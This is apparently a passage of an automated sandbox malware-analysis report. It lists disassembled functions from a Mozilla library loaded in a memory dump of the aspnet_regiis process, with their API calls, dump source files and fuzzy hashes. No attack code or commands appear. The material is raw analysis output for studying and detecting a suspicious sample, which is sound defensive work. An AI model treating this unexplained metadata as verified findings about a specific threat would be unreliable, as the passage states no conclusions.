                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                    • Opcode ID: 2e4d08df97d1fe432e9e4d8592595147e4980982228e07f55db41d4c5dcf7386
                                                                                                                                                                    • Instruction ID: 9fa738fdf514ce1ca97ca7e4b0b52bc608cd17f691886878a9b60e6bc17fad7b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e4d08df97d1fe432e9e4d8592595147e4980982228e07f55db41d4c5dcf7386
                                                                                                                                                                    • Instruction Fuzzy Hash: CD01D870A041038FE720DB9DEB26A4733F59B2632EF054937E91E87F42DA21E554C997
                                                                                                                                                                    Function 6C7E0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E0F6B
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7E0F88
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E0FF7
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7E1067
                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7E10A7
                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C7E114B
                                                                                                                                                                      • Part of subcall function 6C7D8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7F1563), ref: 6C7D8BD5
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7E1174
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7E1186
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803333873-0
                                                                                                                                                                    • Opcode ID: 94a04d84b6a6065443662ad5429d8c38d048e5e7fcfd39ba557628c7531f70a7
                                                                                                                                                                    • Instruction ID: 5f5c1d42a55771a2d7e5d26095c48e84803e153f2430652d7825397123f13a50
                                                                                                                                                                    • Opcode Fuzzy Hash: 94a04d84b6a6065443662ad5429d8c38d048e5e7fcfd39ba557628c7531f70a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E6105766043459FDB10CF25DA8879AB7F5BFC9308F04892DE88947712EB31E949CB82
                                                                                                                                                                    Function 6C79B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6AC
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6D1
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6E3
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B70B
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B71D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C79B61E), ref: 6C79B73F
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B760
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B79A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1394714614-0
                                                                                                                                                                    • Opcode ID: 59e101a9ffa8307d751b3cedb255ed2dc4d7f790114b1e1101f1b1017ded62ac
                                                                                                                                                                    • Instruction ID: 0c7d1fce1122575980100adfb6d0c832127bf9a661a873d6660bec771f75c99f
                                                                                                                                                                    • Opcode Fuzzy Hash: 59e101a9ffa8307d751b3cedb255ed2dc4d7f790114b1e1101f1b1017ded62ac
                                                                                                                                                                    • Instruction Fuzzy Hash: 0841D4B2D001159FCB20DF78ED846AEB7B5BB54324F25072AE825E7781E731B90487E1
                                                                                                                                                                    Function 6C79EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(6C815104), ref: 6C79EFAC
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79EFD7
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C79EFEC
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C79F00C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79F02E
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C79F041
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79F065
                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C79F072
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1148890222-0
                                                                                                                                                                    • Opcode ID: 2fbf4a4a7791a98afe7afa57a611f19c04866ae22ec1f8c851669779eddca2d3
                                                                                                                                                                    • Instruction ID: f1462cc5b4a25358094723fb45f521a78fee5ac13003a60a17fe647ce3517b1b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fbf4a4a7791a98afe7afa57a611f19c04866ae22ec1f8c851669779eddca2d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9941D5B1A002059FCB18CF68ED849AE7769BF84324B24063DE816DB795EB31E915C7E1
                                                                                                                                                                    Function 6C80B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C80B5B9
                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C80B5C5
                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C80B5DA
                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C80B5F4
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C80B605
                                                                                                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C80B61F
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C80B631
                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C80B655
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1276798925-0
                                                                                                                                                                    • Opcode ID: fe325d99693a9033aa77e45b7b39b3259564bb5059323c181f6c63cbdd3fb70e
                                                                                                                                                                    • Instruction ID: 6b5306441298d96cfe58772241a9efed4acb7f723c5b9b76e59c79752b6ae632
                                                                                                                                                                    • Opcode Fuzzy Hash: fe325d99693a9033aa77e45b7b39b3259564bb5059323c181f6c63cbdd3fb70e
                                                                                                                                                                    • Instruction Fuzzy Hash: C531C3B1B001068FCB20DF69C9599BEB7F5EF8532AF100965D50297B40CB30A806CBD1
                                                                                                                                                                    Function 6C7CD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C79EB57,?,?,?,?,?,?,?,?,?), ref: 6C7CD652
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C79EB57,?), ref: 6C7CD660
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C79EB57,?), ref: 6C7CD673
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7CD888
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                    • String ID: Wyl$|Enabled
                                                                                                                                                                    • API String ID: 4142949111-2569927531
                                                                                                                                                                    • Opcode ID: bb87696494be5b4b958b0fef589f6f5da971147031b1eb7dc82b1d57d50b8916
                                                                                                                                                                    • Instruction ID: 884f0327ef841d306b1ac610595cf72d674eb1d568a52e97b87c41e024f6ed91
                                                                                                                                                                    • Opcode Fuzzy Hash: bb87696494be5b4b958b0fef589f6f5da971147031b1eb7dc82b1d57d50b8916
                                                                                                                                                                    • Instruction Fuzzy Hash: A9A127B0B0430A8FDB11CF69C5C47AEBBF1AF59318F14806CD8996BB41D731A845CBA6
                                                                                                                                                                    Function 6C7A9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C7F7ABE), ref: 6C7A985B
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C7F7ABE), ref: 6C7A98A8
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C7A9909
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C7A9918
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A9975
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1281542009-0
                                                                                                                                                                    • Opcode ID: 9cda9d0360cd5f3593e3e46ad103e0ca06bc0c987dc81a3eb8a7bd65a18ef36d
                                                                                                                                                                    • Instruction ID: 011679b24599e597ffdbdc0e8304afaa09ae90c836f16c4df6a2b178b8855afb
                                                                                                                                                                    • Opcode Fuzzy Hash: 9cda9d0360cd5f3593e3e46ad103e0ca06bc0c987dc81a3eb8a7bd65a18ef36d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4271CE746007058FC728CF68C580A56BBF0FF9A3247244B6DE85A8BBA1D732F812CB50
                                                                                                                                                                    Function 6C7AB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB7E6
                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB80C
                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE), ref: 6C7AB88E
                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB896
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 922945588-0
                                                                                                                                                                    • Opcode ID: ef3cda3827cdf31b10709fa49d0093ca13d21e1c10ea068e7996627102221bd1
                                                                                                                                                                    • Instruction ID: ca9b3539bb41404f3cf9bcd005fb32af4015884c188062265b2899b5085889d1
                                                                                                                                                                    • Opcode Fuzzy Hash: ef3cda3827cdf31b10709fa49d0093ca13d21e1c10ea068e7996627102221bd1
                                                                                                                                                                    • Instruction Fuzzy Hash: 51516C757006048FDB28CF99C694A7ABBF5FF89318B69866DD98687741C731F802CB80
                                                                                                                                                                    Function 6C7E1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E1D0F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C7E1BE3,?,?,6C7E1D96,00000000), ref: 6C7E1D18
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C7E1BE3,?,?,6C7E1D96,00000000), ref: 6C7E1D4C
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E1DB7
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7E1DC0
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7E1DDA
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: GetCurrentThreadId.KERNEL32 ref: 6C7E1F03
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C7E1DF2,00000000,00000000), ref: 6C7E1F0C
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C7E1F20
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C7E1DF4
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1880959753-0
                                                                                                                                                                    • Opcode ID: b1cbd3abdde9ad939e60b234f1dcc25b986c2e992ed79260bfc5ec1a828e2b50
                                                                                                                                                                    • Instruction ID: ddd927fb647bd005ba78eb6aad2a5af995b867ba2f028e64c9c6b06090ab2da5
                                                                                                                                                                    • Opcode Fuzzy Hash: b1cbd3abdde9ad939e60b234f1dcc25b986c2e992ed79260bfc5ec1a828e2b50
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B4159B52007019FCB24DF29C58AA66BBF9FB49318F10442EE95A87B42CB71F854CB91
                                                                                                                                                                    Function 6C7D84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D84F3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D850A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D851E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D855B
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D856F
                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D85AC
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D767F
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D7693
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D76A7
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D85B2
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                    • Opcode ID: e40a6854c01631430c042f6cccc029a5babd0623750fa6d2d362a820eb6d9391
                                                                                                                                                                    • Instruction ID: ac8b45a29e1e8537cd3260a78d6a788e7e2f0ad606ed09fe51ddbe185414c562
                                                                                                                                                                    • Opcode Fuzzy Hash: e40a6854c01631430c042f6cccc029a5babd0623750fa6d2d362a820eb6d9391
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E219F742006019FDB24DB28C988A6AB7F5AF4430DF25483DE55BC7B41DB31F948CB91
                                                                                                                                                                    Function 6C7A1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7A1699
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16CB
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16D7
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16DE
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16E5
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16EC
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7A16F9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 375572348-0
                                                                                                                                                                    • Opcode ID: 5f37572923854a77d3319968f2cad58b28476abb9f945f76059b2a3092633d5b
                                                                                                                                                                    • Instruction ID: 4d682e7792431eae62bc759a7bf22754e854c4adae424531cd4f4e97912ee507
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f37572923854a77d3319968f2cad58b28476abb9f945f76059b2a3092633d5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2321D5B0740209AFFB205B688D4AFBB73BCEF96708F404528F6059BA91C6749D54CBE1
                                                                                                                                                                    Function 6C7DF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
